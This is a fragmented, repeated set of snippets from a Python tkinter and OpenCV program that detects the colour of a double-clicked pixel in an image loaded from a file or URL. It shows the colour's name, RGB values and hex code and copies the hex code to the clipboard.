"= int(b) g = int(g) r = int(r) cv2.namedWindow('Image Color Detection') cv2.setMouseCallback('Image Color",
"finalimg2 = ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062') return image_path image_url=StringVar() def urlimg(): imgurl =",
"string to display( Color name and RGB values ) text = getColorName.cname +",
"= urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 = ImageTk.PhotoImage(resized3) img_label = Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open urlopen btn",
"= \"\" def open(): global image_path root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an image file\",",
"Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn image resized4 = urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 = ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command",
"of mouse double click def draw_function(event, x,y,flags,param): if event == cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos,",
"= img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For",
"y b,g,r = img[y,x] b = int(b) g = int(g) r = int(r)",
"img = urlimg.image else : #Reading the image with opencv img = cv2.imread(image_path)",
"get the most matching color def getColorName(R,G,B): minimum = 10000 for i in",
"open start btn image openimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn image resized1 =",
"= urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry = Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open select btn image selectimg",
"= urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 = ImageTk.PhotoImage(resized4) url_btn=Button(root,image=finalimg4, command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry = Entry(root,textvariable =",
"ImageTk.PhotoImage(resized1) strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if image_path == \"\": img = urlimg.image else",
"print(image_path) # open select2 btn image selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn image",
"if (clicked): #scale text according to image size imageWidth = img.shape[0] imageHeight =",
"getColorName.hexcode #copying color code to clipboard pc.copy(getColorName.hexcode) #scale text according to image size",
"import cv2 import numpy as np import urllib.request import pandas as pd from",
"filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path = root.filename print(image_path) # open select2 btn image",
"= Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open select btn image selectimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\")",
"True xpos = x ypos = y b,g,r = img[y,x] b = int(b)",
"x ypos = y b,g,r = img[y,x] b = int(b) g = int(g)",
"start btn image openimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn image resized1 = openimg.resize((118,50),Image.ANTIALIAS)",
"coordinates of mouse double click def draw_function(event, x,y,flags,param): if event == cv2.EVENT_LBUTTONDBLCLK: global",
"#scale text according to image size imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale",
"openimg.resize((118,50),Image.ANTIALIAS) finalimg1 = ImageTk.PhotoImage(resized1) strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if image_path == \"\": img",
"#resize btn image resized2 = selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 = ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062') return",
"b = hexcode = xpos = ypos = 0 #Reading csv file with",
"tkinter import filedialog from PIL import ImageTk,Image import pyperclip as pc root =",
"= hexcode = xpos = ypos = 0 #Reading csv file with pandas",
"# open select2 btn image selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn image resized2",
"abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum): minimum = d getColorName.cname = csv.loc[i,\"color_name\"] getColorName.hexcode = csv.loc[i,\"hex\"] #function",
"Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open select btn image selectimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize",
"= cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy() # open urllabel btn image urllabel = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\")",
"root.configure(bg='#243B53') image_path = \"\" def open(): global image_path root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an",
"= img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint, endpoint, color, thickness)-1 fills entire rectangle",
"files\",\"*.png\"))) image_path = root.filename print(image_path) # open select2 btn image selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp",
"most matching color def getColorName(R,G,B): minimum = 10000 for i in range(len(csv)): d",
"getColorName.cname = csv.loc[i,\"color_name\"] getColorName.hexcode = csv.loc[i,\"hex\"] #function to get x,y coordinates of mouse",
"to clipboard pc.copy(getColorName.hexcode) #scale text according to image size imageWidth = img.shape[0] imageHeight",
"imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint, endpoint, color,",
"clicked = False r = g = b = hexcode = xpos =",
"= b = hexcode = xpos = ypos = 0 #Reading csv file",
"later on) clicked = False r = g = b = hexcode =",
"url_btn=Button(root,image=finalimg4, command = urlimg,borderwidth=0,bg='#243B53').place(x=590,y=260) img_entry = Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open select btn",
"import * import cv2 import numpy as np import urllib.request import pandas as",
"Detection',draw_function) while(1): cv2.imshow(\"Image Color Detection\",img) if (clicked): #scale text according to image size",
"np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image = cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy() # open urllabel btn image urllabel",
"(are used later on) clicked = False r = g = b =",
"double click def draw_function(event, x,y,flags,param): if event == cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos, clicked clicked",
"import pandas as pd from tkinter import filedialog from PIL import ImageTk,Image import",
"return image_path image_url=StringVar() def urlimg(): imgurl = image_url.get() url_response = urllib.request.urlopen(imgurl) img_array =",
"names=index, header=None) #function to calculate minimum distance from all colors and get the",
"ypos = 0 #Reading csv file with pandas and giving names to each",
"urllib.request.urlopen(imgurl) img_array = np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image = cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy() # open urllabel",
"all colors and get the most matching color def getColorName(R,G,B): minimum = 10000",
"an image file\", filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path = root.filename print(image_path) # open",
"root.destroy() # open urllabel btn image urllabel = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn image",
"abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum): minimum = d getColorName.cname = csv.loc[i,\"color_name\"] getColorName.hexcode =",
"#Creating text string to display( Color name and RGB values ) text =",
"#resize btn image resized3 = urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 = ImageTk.PhotoImage(resized3) img_label = Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260)",
"x,y,flags,param): if event == cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos, clicked clicked = True xpos =",
"Detection') cv2.setMouseCallback('Image Color Detection',draw_function) while(1): cv2.imshow(\"Image Color Detection\",img) if (clicked): #scale text according",
"select2 btn image selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn image resized2 = selectimg2.resize((200,50),Image.ANTIALIAS)",
"light colours we will display text in black colour if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False",
"pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn image resized3 = urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 = ImageTk.PhotoImage(resized3) img_label = Label(root,",
"finalimg1 = ImageTk.PhotoImage(resized1) strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if image_path == \"\": img =",
"= root.filename print(image_path) # open select2 btn image selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize",
": #Reading the image with opencv img = cv2.imread(image_path) #declaring global variables (are",
"min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very light colours we will display text",
"= image_url.get() url_response = urllib.request.urlopen(imgurl) img_array = np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image = cv2.imdecode(img_array,-1) image_url.set(\"\")",
"as pc root = Tk() root.title(\"Image Color Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path = \"\"",
"pandas and giving names to each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv = pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index,",
"to image size imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.rectangle(image,",
"file with pandas and giving names to each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv = pd.read_csv('C:/Users/7p/Desktop/temp",
"= xpos = ypos = 0 #Reading csv file with pandas and giving",
"== \"\": img = urlimg.image else : #Reading the image with opencv img",
"cv2.setMouseCallback('Image Color Detection',draw_function) while(1): cv2.imshow(\"Image Color Detection\",img) if (clicked): #scale text according to",
"#function to get x,y coordinates of mouse double click def draw_function(event, x,y,flags,param): if",
"black colour if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break the loop when User hits 'enter'",
"G='+ str(g) + ' B='+ str(b) +\" \"+ getColorName.hexcode #copying color code to",
"open urlopen btn image urlopen = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn image resized4 =",
"' G='+ str(g) + ' B='+ str(b) +\" \"+ getColorName.hexcode #copying color code",
"= urlimg.image else : #Reading the image with opencv img = cv2.imread(image_path) #declaring",
"Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) # open start btn image openimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn",
"urlopen = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn image resized4 = urlopen.resize((200,50),Image.ANTIALIAS) finalimg4 = ImageTk.PhotoImage(resized4)",
"int(g) r = int(r) cv2.namedWindow('Image Color Detection') cv2.setMouseCallback('Image Color Detection',draw_function) while(1): cv2.imshow(\"Image Color",
"= pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index, header=None) #function to calculate minimum distance from all colors",
"display( Color name and RGB values ) text = getColorName.cname + ' R='+",
"g = int(g) r = int(r) cv2.namedWindow('Image Color Detection') cv2.setMouseCallback('Image Color Detection',draw_function) while(1):",
"xpos = ypos = 0 #Reading csv file with pandas and giving names",
"= True xpos = x ypos = y b,g,r = img[y,x] b =",
"d = abs(R- int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum): minimum = d",
"* import cv2 import numpy as np import urllib.request import pandas as pd",
"opencv img = cv2.imread(image_path) #declaring global variables (are used later on) clicked =",
"ImageTk.PhotoImage(resized) my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) # open start btn image openimg = Image.open(\"C:/Users/7p/Desktop/temp",
"' B='+ str(b) +\" \"+ getColorName.hexcode #copying color code to clipboard pc.copy(getColorName.hexcode) #scale",
"def draw_function(event, x,y,flags,param): if event == cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos, clicked clicked = True",
"pc root = Tk() root.title(\"Image Color Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path = \"\" def",
"size imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint, endpoint,",
"the most matching color def getColorName(R,G,B): minimum = 10000 for i in range(len(csv)):",
"= x ypos = y b,g,r = img[y,x] b = int(b) g =",
"img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very light colours we",
"image resized3 = urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 = ImageTk.PhotoImage(resized3) img_label = Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open",
"in black colour if(r+g+b>=600): cv2.putText(img, text,(50,40),2,fontScale,(0,0,0),1,cv2.LINE_AA) clicked=False #Break the loop when User hits",
"= ImageTk.PhotoImage(resized) my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) # open start btn image openimg =",
"image_path image_url=StringVar() def urlimg(): imgurl = image_url.get() url_response = urllib.request.urlopen(imgurl) img_array = np.array(bytearray(url_response.read()),",
"tkinter import * import cv2 import numpy as np import urllib.request import pandas",
"resized2 = selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 = ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062') return image_path image_url=StringVar() def",
"minimum = d getColorName.cname = csv.loc[i,\"color_name\"] getColorName.hexcode = csv.loc[i,\"hex\"] #function to get x,y",
"import numpy as np import urllib.request import pandas as pd from tkinter import",
"image urllabel = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn image resized3 = urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 =",
"= ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062') return image_path image_url=StringVar() def urlimg(): imgurl = image_url.get()",
"\"\": img = urlimg.image else : #Reading the image with opencv img =",
"cv2 import numpy as np import urllib.request import pandas as pd from tkinter",
"cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very light colours we will display text in black colour",
"ImageTk.PhotoImage(resized3) img_label = Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open urlopen btn image urlopen = Image.open(\"C:/Users/7p/Desktop/temp",
"#function to calculate minimum distance from all colors and get the most matching",
"= Tk() root.title(\"Image Color Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path = \"\" def open(): global",
"clipboard pc.copy(getColorName.hexcode) #scale text according to image size imageWidth = img.shape[0] imageHeight =",
"range(len(csv)): d = abs(R- int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum): minimum =",
"#resize btn image resized = selectimg.resize((200,50),Image.ANTIALIAS) finalimg = ImageTk.PhotoImage(resized) my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150)",
"image selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn image resized2 = selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 =",
"image_url.set(\"\") root.destroy() # open urllabel btn image urllabel = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn",
"= min(imageWidth,imageHeight)/(800) #cv2.rectangle(image, startpoint, endpoint, color, thickness)-1 fills entire rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r),",
"numpy as np import urllib.request import pandas as pd from tkinter import filedialog",
"filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an image file\", filetypes=((\"All files\",\"*.*\"),(\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"))) image_path = root.filename print(image_path)",
"image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open select btn image selectimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn image",
"if(d<=minimum): minimum = d getColorName.cname = csv.loc[i,\"color_name\"] getColorName.hexcode = csv.loc[i,\"hex\"] #function to get",
"import pyperclip as pc root = Tk() root.title(\"Image Color Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path",
"to get x,y coordinates of mouse double click def draw_function(event, x,y,flags,param): if event",
"image_url=StringVar() def urlimg(): imgurl = image_url.get() url_response = urllib.request.urlopen(imgurl) img_array = np.array(bytearray(url_response.read()), dtype=np.uint8)",
"csv.loc[i,\"hex\"] #function to get x,y coordinates of mouse double click def draw_function(event, x,y,flags,param):",
"img[y,x] b = int(b) g = int(g) r = int(r) cv2.namedWindow('Image Color Detection')",
"text string to display( Color name and RGB values ) text = getColorName.cname",
"image openimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn image resized1 = openimg.resize((118,50),Image.ANTIALIAS) finalimg1 =",
"image_path = root.filename print(image_path) # open select2 btn image selectimg2 = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\")",
"startpoint, endpoint, color, thickness)-1 fills entire rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r), -1) getColorName(r,g,b) #Creating",
"img = cv2.imread(image_path) #declaring global variables (are used later on) clicked = False",
"image with opencv img = cv2.imread(image_path) #declaring global variables (are used later on)",
"= ImageTk.PhotoImage(resized1) strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if image_path == \"\": img = urlimg.image",
"btn image resized3 = urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 = ImageTk.PhotoImage(resized3) img_label = Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) #",
"r = int(r) cv2.namedWindow('Image Color Detection') cv2.setMouseCallback('Image Color Detection',draw_function) while(1): cv2.imshow(\"Image Color Detection\",img)",
"+ abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum): minimum = d getColorName.cname = csv.loc[i,\"color_name\"] getColorName.hexcode",
"(b,g,r), -1) getColorName(r,g,b) #Creating text string to display( Color name and RGB values",
"\"+ getColorName.hexcode #copying color code to clipboard pc.copy(getColorName.hexcode) #scale text according to image",
"else : #Reading the image with opencv img = cv2.imread(image_path) #declaring global variables",
"= Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) # open start btn image openimg = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/startbtn1.png\") #resize",
"each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv = pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index, header=None) #function to calculate minimum",
"dtype=np.uint8) urlimg.image = cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy() # open urllabel btn image urllabel =",
"header=None) #function to calculate minimum distance from all colors and get the most",
"urllib.request import pandas as pd from tkinter import filedialog from PIL import ImageTk,Image",
"image resized2 = selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 = ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062') return image_path image_url=StringVar()",
"img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very",
"image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open urlopen btn image urlopen = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn image",
"urllabel = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn image resized3 = urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 = ImageTk.PhotoImage(resized3)",
"int(b) g = int(g) r = int(r) cv2.namedWindow('Image Color Detection') cv2.setMouseCallback('Image Color Detection',draw_function)",
"open urllabel btn image urllabel = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn image resized3 =",
"the loop when User hits 'enter' key if cv2.waitKey(20) & 0xFF ==13: break",
"= ImageTk.PhotoImage(resized3) img_label = Label(root, image=finalimg3,borderwidth=0,bg='#243B53').place(x=150,y=260) # open urlopen btn image urlopen =",
"get x,y coordinates of mouse double click def draw_function(event, x,y,flags,param): if event ==",
"text according to image size imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale =",
"pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv', names=index, header=None) #function to calculate minimum distance from all colors and",
"10000 for i in range(len(csv)): d = abs(R- int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+ abs(B-",
"int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum): minimum = d getColorName.cname = csv.loc[i,\"color_name\"]",
"img_entry = Entry(root,textvariable = image_url,width=12,font=('Roboto',26)).place(x=300,y=260) # open select btn image selectimg = Image.open(\"C:/Users/7p/Desktop/temp",
"#cv2.rectangle(image, startpoint, endpoint, color, thickness)-1 fills entire rectangle cv2.rectangle(img,(50,10), (max(imageWidth,imageHeight),50), (b,g,r), -1) getColorName(r,g,b)",
"str(g) + ' B='+ str(b) +\" \"+ getColorName.hexcode #copying color code to clipboard",
"(clicked): #scale text according to image size imageWidth = img.shape[0] imageHeight = img.shape[1]",
"= selectimg.resize((200,50),Image.ANTIALIAS) finalimg = ImageTk.PhotoImage(resized) my_btn = Button(root,image=finalimg,command=open,borderwidth=0,bg='#243B53') my_btn.place(x=100,y=150) # open start btn",
"pypro/python-project-color-detection/buttons/startbtn1.png\") #resize btn image resized1 = openimg.resize((118,50),Image.ANTIALIAS) finalimg1 = ImageTk.PhotoImage(resized1) strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155)",
"imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA)",
"= np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image = cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy() # open urllabel btn image",
"= int(r) cv2.namedWindow('Image Color Detection') cv2.setMouseCallback('Image Color Detection',draw_function) while(1): cv2.imshow(\"Image Color Detection\",img) if",
"Tk() root.title(\"Image Color Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path = \"\" def open(): global image_path",
"= ypos = 0 #Reading csv file with pandas and giving names to",
"matching color def getColorName(R,G,B): minimum = 10000 for i in range(len(csv)): d =",
"\"\" def open(): global image_path root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an image file\", filetypes=((\"All",
"image_path = \"\" def open(): global image_path root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp pypro\\python-project-color-detection\",title=\"Select an image",
"imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very light",
"values ) text = getColorName.cname + ' R='+ str(r) + ' G='+ str(g)",
"= selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 = ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062') return image_path image_url=StringVar() def urlimg():",
"to calculate minimum distance from all colors and get the most matching color",
"with pandas and giving names to each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv = pd.read_csv('C:/Users/7p/Desktop/temp pypro/python-project-color-detection/colors.csv',",
"csv file with pandas and giving names to each column index=[\"color\",\"color_name\",\"hex\",\"R\",\"G\",\"B\"] csv =",
"name and RGB values ) text = getColorName.cname + ' R='+ str(r) +",
"filedialog from PIL import ImageTk,Image import pyperclip as pc root = Tk() root.title(\"Image",
"color code to clipboard pc.copy(getColorName.hexcode) #scale text according to image size imageWidth =",
"for i in range(len(csv)): d = abs(R- int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"]))",
"my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2 root.configure(bg='#363062') return image_path image_url=StringVar() def urlimg(): imgurl = image_url.get() url_response =",
"fontScale = min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType ) cv2.putText(img, text,(50,40),2,fontScale,(255,255,255),1,cv2.LINE_AA) #For very light colours we will",
"pc.copy(getColorName.hexcode) #scale text according to image size imageWidth = img.shape[0] imageHeight = img.shape[1]",
"cv2.imread(image_path) #declaring global variables (are used later on) clicked = False r =",
"event == cv2.EVENT_LBUTTONDBLCLK: global b,g,r,xpos,ypos, clicked clicked = True xpos = x ypos",
"Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn2.png\") #resize btn image resized2 = selectimg2.resize((200,50),Image.ANTIALIAS) finalimg2 = ImageTk.PhotoImage(resized2) my_btn.configure(image=finalimg2,state=DISABLED) my_btn.image=finalimg2",
"b,g,r,xpos,ypos, clicked clicked = True xpos = x ypos = y b,g,r =",
"Detection\") root.geometry(\"936x536+300+130\") root.configure(bg='#243B53') image_path = \"\" def open(): global image_path root.filename = filedialog.askopenfilename(initialdir=r\"C:\\Users\\7p\\Desktop\\temp",
"urlopen btn image urlopen = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn image resized4 = urlopen.resize((200,50),Image.ANTIALIAS)",
"r = g = b = hexcode = xpos = ypos = 0",
"#For very light colours we will display text in black colour if(r+g+b>=600): cv2.putText(img,",
"-1) getColorName(r,g,b) #Creating text string to display( Color name and RGB values )",
"b,g,r = img[y,x] b = int(b) g = int(g) r = int(r) cv2.namedWindow('Image",
"hexcode = xpos = ypos = 0 #Reading csv file with pandas and",
"image_url.get() url_response = urllib.request.urlopen(imgurl) img_array = np.array(bytearray(url_response.read()), dtype=np.uint8) urlimg.image = cv2.imdecode(img_array,-1) image_url.set(\"\") root.destroy()",
"with opencv img = cv2.imread(image_path) #declaring global variables (are used later on) clicked",
"image resized1 = openimg.resize((118,50),Image.ANTIALIAS) finalimg1 = ImageTk.PhotoImage(resized1) strt_btn = Button(root,image=finalimg1,command=root.quit,borderwidth=0,bg='#243B53').place(x=620,y=155) root.mainloop() if image_path",
"# open urlopen btn image urlopen = Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urlopen.png\") #resize btn image resized4",
"np import urllib.request import pandas as pd from tkinter import filedialog from PIL",
"my_btn.image=finalimg2 root.configure(bg='#363062') return image_path image_url=StringVar() def urlimg(): imgurl = image_url.get() url_response = urllib.request.urlopen(imgurl)",
"Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/selectbtn.png\") #resize btn image resized = selectimg.resize((200,50),Image.ANTIALIAS) finalimg = ImageTk.PhotoImage(resized) my_btn =",
"in range(len(csv)): d = abs(R- int(csv.loc[i,\"R\"])) + abs(G- int(csv.loc[i,\"G\"]))+ abs(B- int(csv.loc[i,\"B\"])) if(d<=minimum): minimum",
"from PIL import ImageTk,Image import pyperclip as pc root = Tk() root.title(\"Image Color",
"= Image.open(\"C:/Users/7p/Desktop/temp pypro/python-project-color-detection/buttons/urllabel.png\") #resize btn image resized3 = urllabel.resize((100,50),Image.ANTIALIAS) finalimg3 = ImageTk.PhotoImage(resized3) img_label",
"to image size imageWidth = img.shape[0] imageHeight = img.shape[1] fontScale = min(imageWidth,imageHeight)/(800) #cv2.putText(img,text,start,font(0-7),fontScale,color,thickness,lineType",
